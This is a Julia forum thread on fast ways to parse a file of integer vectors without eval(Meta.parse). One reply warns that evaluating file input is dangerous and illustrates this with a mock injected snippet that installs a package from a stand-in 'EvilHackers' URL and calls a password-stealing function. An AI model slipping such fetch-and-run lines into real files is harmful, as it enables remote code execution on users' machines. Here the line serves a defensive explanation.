# Parsing a vector of vectors with Meta.parse?

**URL:** <https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274>\
**Category:** General Usage\
**Tags:** parsing\
**Created:** [February 15, 2024, 10:38pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274 "2024-02-15T22:38:30Z")\
**Posts on this page:** 13\
**Page:** 1

<div class="post-metadata">

**Author:** ![Leo\_I](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/leo_i/32/27262_2.png) [@Leo\_I](https://discourse.julialang.org/u/Leo_I)\
**Post date:** [February 15, 2024, 10:38pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/1 "2024-02-15T22:38:30Z")

</div>

I have a concrete problem, where `Meta.parse(line)` is unbearably slow.

My use-case is that I have a long .txt file, in which each line has the form  
`[x1, ..., xn]`, where `x1,...,xn` are specific integers. I must import/convert the whole file into a `Vector{Vector{Int}}`. My solution was

```julia
output = Vector{Int}[]
open(file, "r") do io
    for line in eachline(io)
        push!(output, eval(Meta.parse(line))) end end;

```

What would be a more efficient way of achieving this?

P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.

---

<div class="post-metadata">

**Author:** ![mbauman](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/mbauman/32/31082_2.png) [@mbauman](https://discourse.julialang.org/u/mbauman)\
**Post date:** [February 15, 2024, 11:01pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/2 "2024-02-15T23:01:51Z")

</div>

I’ve split this into a new topic and removed the ping to a particular person — this can be addressed by many folks here. If keeping your data portable is a goal, I’d just save it as a normal CSV (without the `[]` formatting). It’s far easier to use standard tools (like `CSV.read`) first and then restructure later. For example, you can read directly into a `Matrix{Int}` with CSV.read, and then just collect the rows into a vector:

```Julia
using CSV: CSV, Tables
matrix = CSV.read(file, Tables.matrix; header=false)
output = collect(eachrow(matrix))

```

---

<div class="post-metadata">

**Author:** ![roflmaostc](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/roflmaostc/32/30123_2.png) [@roflmaostc](https://discourse.julialang.org/u/roflmaostc)\
**Post date:** [February 15, 2024, 11:02pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/3 "2024-02-15T23:02:47Z")

</div>

Does this work for you?

```julia
# /tmp/lel.txt
1 2 3 4 5
9 8 7 6 5
1 2 3 3 4
5 6 7 8 9
1 2 3 4 5

# REPL
julia> using DelimitedFiles

julia> x = readdlm("/tmp/lel.txt")
5×5 Matrix{Float64}:
 1.0 2.0 3.0 4.0 5.0
 9.0 8.0 7.0 6.0 5.0
 1.0 2.0 3.0 3.0 4.0
 5.0 6.0 7.0 8.0 9.0
 1.0 2.0 3.0 4.0 5.0

julia> [x[i, :] for i in axes(x, 2)]
5-element Vector{Vector{Float64}}:
 [1.0, 2.0, 3.0, 4.0, 5.0]
 [9.0, 8.0, 7.0, 6.0, 5.0]
 [1.0, 2.0, 3.0, 3.0, 4.0]
 [5.0, 6.0, 7.0, 8.0, 9.0]
 [1.0, 2.0, 3.0, 4.0, 5.0]
```

---

<div class="post-metadata">

**Author:** ![rafael.guerra](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/rafael.guerra/32/216610_2.png) [@rafael.guerra](https://discourse.julialang.org/u/rafael.guerra)\
**Post date:** [February 15, 2024, 11:09pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/4 "2024-02-15T23:09:57Z")

</div>

> [@roflmaostc](#):
>
> `[x[i, :] for i in axes(x, 2)]`

Or simply:  
`collect.(eachrow(x))`

---

<div class="post-metadata">

**Author:** ![rafael.guerra](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/rafael.guerra/32/216610_2.png) [@rafael.guerra](https://discourse.julialang.org/u/rafael.guerra)\
**Post date:** [February 15, 2024, 11:11pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/5 "2024-02-15T23:11:29Z")

</div>

See [related post here](https://discourse.julialang.org/t/parse-vector-from-string).

PS:  
without using eval you could do:

```julia
str = "[1, 2, 3]"
parse.(Int, split(filter(∉(['[',']']), str), ','))

```

---

<div class="post-metadata">

**Author:** ![Leo\_I](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/leo_i/32/27262_2.png) [@Leo\_I](https://discourse.julialang.org/u/Leo_I)\
**Post date:** [February 16, 2024, 7:12am UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/6 "2024-02-16T07:12:14Z")

</div>

Thank you for creating a new topic.

I don’t think using .csv is appropriate, since my `Vector{Int}`s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), hence why I want the end-result to be `Vector{Vector{Int}}`.

---

<div class="post-metadata">

**Author:** ![Leo\_I](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/leo_i/32/27262_2.png) [@Leo\_I](https://discourse.julialang.org/u/Leo_I)\
**Post date:** [February 16, 2024, 7:17am UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/7 "2024-02-16T07:17:56Z")

</div>

@roflmaostc No, the result contains `Vector{Float64}`s instead of `Vector{Int64}`s.

---

<div class="post-metadata">

**Author:** ![Leo\_I](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/leo_i/32/27262_2.png) [@Leo\_I](https://discourse.julialang.org/u/Leo_I)\
**Post date:** [February 16, 2024, 7:22am UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/8 "2024-02-16T07:22:47Z")

</div>

Yes, `parse.(Int, split(line[2:end-1], ','))` is much much faster, thank you!

I was hoping for a more general solution, though. If each line represented, for instance, a `Tuple{Vector{Int}, Vector{Int}}` and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.

Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to `parse.(Int, split(...))`?

---

<div class="post-metadata">

**Author:** ![Benny](https://avatars.discourse-cdn.com/v4/letter/b/49beb7/32.png) [@Benny](https://discourse.julialang.org/u/Benny)\
**Post date:** [February 16, 2024, 7:51am UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/9 "2024-02-16T07:51:09Z")

</div>

> [@Leo\_I](#):
>
> Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to `parse.(Int, split(...))`?

In short, no, otherwise people would be doing this already instead of making libraries like Parsers.jl. To sum up the reasons why you don’t want to just `eval(Meta.parse(...`:

1. The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
2. One of your goals is to let this file be read in other programming languages. Not every language writes arrays as `[...]` like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
3. Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking

```julia
import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()

```

- into a file among a batch of other safe files. That was a cartoonish example of malware, a more likely possibility is someone naively writing code that interferes with your session, like assigning vectors to global variables `pi = [3, 1, 4, 1, 5, 9, 2]`, or that fails to comply with your code, like `Float64[1.0, 2.0, 3.0]`. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.

---

<div class="post-metadata">

**Author:** ![roflmaostc](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/roflmaostc/32/30123_2.png) [@roflmaostc](https://discourse.julialang.org/u/roflmaostc)\
**Post date:** [February 16, 2024, 9:48am UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/10 "2024-02-16T09:48:07Z")

</div>

Yes, but just because my file contained integers and not floats 🙂

---

<div class="post-metadata">

**Author:** ![thofma](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/thofma/32/1691_2.png) [@thofma](https://discourse.julialang.org/u/thofma)\
**Post date:** [February 16, 2024, 1:29pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/11 "2024-02-16T13:29:39Z")

</div>

Shameless selfplug (using [GitHub - thofma/Tryparse.jl: Parsing basic types in julia](https://github.com/thofma/Tryparse.jl)):

```julia-repl
julia> using Tryparse

julia> Tryparse.parse(Vector{Int}, "[3, 2, 1]")
3-element Vector{Int64}:
 3
 2
 1

julia> Tryparse.parse(Vector{Vector{Int}}, "[[1, 2], [3, 4, 1]]")
2-element Vector{Vector{Int64}}:
 [1, 2]
 [3, 4, 1]

julia> Tryparse.parse(Tuple{Vector{Int}, Vector{Int}}, "([3, 2, 1], [3, 2, 1434])")
([3, 2, 1], [3, 2, 1434])

```

So you can just keep your original format.

Edit: This is free of `eval`.

---

<div class="post-metadata">

**Author:** ![bertschi](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/bertschi/32/33462_2.png) [@bertschi](https://discourse.julialang.org/u/bertschi)\
**Post date:** [February 16, 2024, 5:54pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/12 "2024-02-16T17:54:48Z")

</div>

From what I understand, your format should be valid JSON, i.e., you could just parse it like

```julia
s = join(string.([randn(i) for i = 2:8]), "\n");
JSON3.read.(eachline(IOBuffer(s)))

```

---

<div class="post-metadata">

**Author:** ![Leo\_I](https://sea2.discourse-cdn.com/julialang/user_avatar/discourse.julialang.org/leo_i/32/27262_2.png) [@Leo\_I](https://discourse.julialang.org/u/Leo_I)\
**Post date:** [February 16, 2024, 8:12pm UTC](https://discourse.julialang.org/t/parsing-a-vector-of-vectors-with-meta-parse/110274/13 "2024-02-16T20:12:44Z")

</div>

> [@Leo\_I](#):
>
> `eval(Meta.parse(line))`

Thank you @bertschi @thofma !

Tryparse is still quite slow in my case (a million lines of vectors of length at most 30). But JSON3 was impressively fast. The fastest is still my manual `parse.(Int, split(line[2:end-1], ','))`.

I guess Benny’s point 1. holds: the more assumptions Julia has, the easier it is optimize.
